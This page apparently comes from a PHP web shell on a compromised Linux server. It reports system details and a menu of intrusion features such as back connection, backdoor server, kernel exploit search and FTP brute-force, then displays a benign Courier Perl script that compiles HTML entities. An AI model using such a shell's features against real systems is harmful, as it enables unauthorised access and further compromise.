|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 27.58 GB of 70.42 GB (39.17%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
courier-0.66.1/
unicode/
- drwxrwxrwx
|
Viewing file: mkhtmlent.pl (1000 B) -rw-rw-rw-Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
#! /usr/bin/perl # # Compile list of HTML 4.0/XHTML entities.
my %ent=("amp" => 38, "lt" => 60, "gt" => 62);
foreach ("xhtml-lat1.ent", "xhtml-special.ent", "xhtml-symbol.ent") { open(F, "<$_") or die "$_: $!\n";
my $l;
while (defined($l=<F>)) { chomp $l; next unless $l =~ m/^<!ENTITY\s+([^\s]+)\s+"&#(\d+);">/;
$ent{$1}=$2; } }
print "static const char n[]={\n";
my $prev="\t";
foreach (sort keys %ent) { my $n=$_;
my $str="";
print $prev; $prev="";
foreach (0..length($n)-1) { $str .= $prev . ord(substr($n, $_, 1)); $prev=", "; }
print $str;
$prev=",";
$prev .= (" " x (40 - length($str))) if (length($str) < 40);
$prev .= " /* $n */\n\t"; }
substr($prev, 0, 1)=" ";
$prev =~ s/\t//;
print "$prev};\n\nstatic const struct i ii[]={";
$prev="\n\t";
my $n=0;
foreach (sort keys %ent) { print $prev . "{$n, " . length($_) . ", $ent{$_}" . "}";
$n += length($_); $prev=",\n\t"; }
print "\n};\n";
|